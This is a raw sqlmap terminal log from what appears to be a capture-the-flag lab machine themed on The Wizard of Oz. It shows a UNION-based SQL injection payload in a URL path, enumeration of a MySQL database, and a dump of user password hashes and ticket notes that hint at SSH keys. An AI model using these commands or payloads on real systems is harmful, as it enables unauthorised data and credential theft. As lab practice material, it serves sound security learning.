sqlmap --url http://10.10.10.96/users/* --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.2.10#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:29:15

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[10:29:18] [INFO] resuming back-end DBMS 'mysql' 
[10:29:18] [INFO] testing connection to the target URL
[10:29:18] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://10.10.10.96:80/users/' UNION ALL SELECT CONCAT(CONCAT('qqbpq','bfeDBzEleCJCypvNHISZViDqrgSvuPYTvhXLsbSb'),'qkkkq')-- BIPs
---
[10:29:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[10:29:18] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:29:18] [INFO] fetching current database
[10:29:18] [INFO] fetching tables for database: 'ozdb'
[10:29:19] [INFO] used SQL query returns 2 entries
[10:29:19] [INFO] retrieved: tickets_gbw
[10:29:19] [INFO] retrieved: users_gbw
[10:29:19] [INFO] fetching columns for table 'users_gbw' in database 'ozdb'                                                                          
[10:29:19] [INFO] used SQL query returns 3 entries
[10:29:19] [INFO] retrieved: "id","int(11)"
[10:29:20] [INFO] retrieved: "username","text"
[10:29:20] [INFO] retrieved: "password","text"
[10:29:20] [INFO] fetching entries for table 'users_gbw' in database 'ozdb'                                                                          
[10:29:20] [INFO] used SQL query returns 6 entries
[10:29:20] [INFO] retrieved: "1","$pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78","dorthi"
[10:29:20] [INFO] retrieved: "2","$pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk","tin.man"
[10:29:21] [INFO] retrieved: "3","$pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY","wizard.oz"
[10:29:21] [INFO] retrieved: "4","$pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY","coward.lyon"
[10:29:21] [INFO] retrieved: "5","$pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg","toto"
[10:29:21] [INFO] retrieved: "6","$pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ","admin"
Database: ozdb                                                                                                                                       
Table: users_gbw
[6 entries]
+----+-------------+----------------------------------------------------------------------------------------+
| id | username    | password                                                                               |
+----+-------------+----------------------------------------------------------------------------------------+
| 1  | dorthi      | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 |
| 2  | tin.man     | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk |
| 3  | wizard.oz   | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY |
| 4  | coward.lyon | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY |
| 5  | toto        | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg |
| 6  | admin       | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ |
+----+-------------+----------------------------------------------------------------------------------------+

[10:29:21] [INFO] table 'ozdb.users_gbw' dumped to CSV file '/root/.sqlmap/output/10.10.10.96/dump/ozdb/users_gbw.csv'
[10:29:21] [INFO] fetching columns for table 'tickets_gbw' in database 'ozdb'
[10:29:22] [INFO] used SQL query returns 3 entries
[10:29:22] [INFO] retrieved: "id","int(11)"
[10:29:22] [INFO] retrieved: "name","varchar(10)"
[10:29:22] [INFO] retrieved: "desc","text"
[10:29:22] [INFO] fetching entries for table 'tickets_gbw' in database 'ozdb'                                                                        
[10:29:22] [INFO] used SQL query returns 12 entries
[10:29:23] [INFO] retrieved: "Reissued new id_rsa and id_rsa.pub keys for ssh access to dorthi.","1","GBR-987"
[10:29:23] [INFO] retrieved: "Where did all these damn monkey's come from!?  I need to call pest control.","2","GBR-1204"
[10:29:23] [INFO] retrieved: "Note to self: Toto keeps chewing on the curtain, find one with dog repellent.","3","GBR-1205"
[10:29:23] [INFO] retrieved: "Nothing to see here... V2hhdCBkaWQgeW91IGV4cGVjdD8=","4","GBR-1389"
[10:29:23] [INFO] retrieved: "Think of a better secret knock for the front door.  Doesn't seem that secure, a Lion got in today.","5","GBR-4034"
[10:29:23] [INFO] retrieved: "I bet you won't read the next entry.","6","GBR-5012"
[10:29:24] [INFO] retrieved: "HAHA! Made you look.","7","GBR-7890"
[10:29:24] [INFO] retrieved: "Dorthi should be able to find her keys in the default folder under /home/dorthi/ on the db.","8","GBR-7945"
[10:29:24] [INFO] retrieved: "Seriously though, WW91J3JlIGp1c3QgdHJ5aW5nIHRvbyBoYXJkLi4uIG5vYm9keSBoaWRlcyBhbnl0aGluZyBpbiBiYXNlNjQgYW55bW9yZS4uLiB...
[10:29:24] [INFO] retrieved: "You are just wasting time now... someone else is getting user.txt","10","GBR-8042"
[10:29:24] [INFO] retrieved: "Look... now they've got root.txt and you don't even have user.txt","11","GBR-8457"
[10:29:25] [INFO] retrieved: "db information loaded to ticket application for shared db access","12","GBR-9872"
Database: ozdb                                                                                                                                       
Table: tickets_gbw
[12 entries]
+----+----------+--------------------------------------------------------------------------------------------------------------------------------+
| id | name     | desc                                                                                                                           |
+----+----------+--------------------------------------------------------------------------------------------------------------------------------+
| 1  | GBR-987  | Reissued new id_rsa and id_rsa.pub keys for ssh access to dorthi.                                                              |
| 2  | GBR-1204 | Where did all these damn monkey's come from!?  I need to call pest control.                                                    |
| 3  | GBR-1205 | Note to self: Toto keeps chewing on the curtain, find one with dog repellent.                                                  |
| 4  | GBR-1389 | Nothing to see here... V2hhdCBkaWQgeW91IGV4cGVjdD8=                                                                            |
| 5  | GBR-4034 | Think of a better secret knock for the front door.  Doesn't seem that secure, a Lion got in today.                             |
| 6  | GBR-5012 | I bet you won't read the next entry.                                                                                           |
| 7  | GBR-7890 | HAHA! Made you look.                                                                                                           |
| 8  | GBR-7945 | Dorthi should be able to find her keys in the default folder under /home/dorthi/ on the db.                                    |
| 9  | GBR-8011 | Seriously though, WW91J3JlIGp1c3QgdHJ5aW5nIHRvbyBoYXJkLi4uIG5vYm9keSBoaWRlcyBhbnl0aGluZyBpbiBiYXNlNjQgYW55bW9yZS4uLiBjJ21vbi4= |
| 10 | GBR-8042 | You are just wasting time now... someone else is getting user.txt                                                              |
| 11 | GBR-8457 | Look... now they've got root.txt and you don't even have user.txt                                                              |
| 12 | GBR-9872 | db information loaded to ticket application for shared db access                                                               |
+----+----------+--------------------------------------------------------------------------------------------------------------------------------+

[10:29:25] [INFO] table 'ozdb.tickets_gbw' dumped to CSV file '/root/.sqlmap/output/10.10.10.96/dump/ozdb/tickets_gbw.csv'
[10:29:25] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.96'

[*] shutting down at 10:29:25

